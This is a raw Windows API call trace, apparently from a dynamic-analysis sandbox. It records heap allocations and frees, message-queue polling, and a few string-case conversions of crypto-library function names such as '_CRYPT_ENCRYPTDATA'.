RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0198.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0198.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0198.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11e7e) returned 0xbea018 [0198.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0198.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0198.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0198.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0198.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.473] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0198.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0198.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0198.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0198.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0198.473] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0198.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0198.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.474] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0198.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0198.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0198.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0198.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0198.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0198.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0198.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11e7e) returned 0xbea018 [0198.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2778 [0198.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0198.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0198.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27a8 [0198.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0198.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0198.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2618 [0198.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0198.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0198.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0198.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4e0 [0198.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0198.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0198.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0198.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0198.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0198.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11e7e) returned 0xa5f008 [0198.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0198.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0198.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0198.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0198.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0198.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0198.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0198.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0198.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0198.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0198.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0198.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0198.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0198.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0198.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0198.477] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0198.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0198.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0198.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0198.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0198.477] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0198.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0198.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0198.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0198.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0198.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0198.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0198.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0198.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0198.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0198.478] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0198.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0198.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0198.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2688 [0198.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0198.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0198.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0198.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda80 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0198.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0198.479] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0198.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.479] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0198.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0198.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0198.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0198.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0198.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0198.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0198.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0198.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0198.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0198.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0198.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0198.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0198.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0198.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0198.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0198.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0198.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.480] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0198.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0198.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0198.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0198.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0198.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0198.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0198.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0198.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0198.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0198.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0198.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0198.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0198.481] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0198.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0198.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0198.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0198.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0198.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0198.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0198.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.482] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0198.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0198.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0198.482] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0198.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0198.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0198.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0198.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0198.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0198.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0198.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0198.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0198.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0198.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0198.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0198.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0198.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0198.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0198.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0198.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0198.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0198.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0198.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0198.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0198.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0198.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0198.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0198.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0198.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0198.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0198.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0198.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 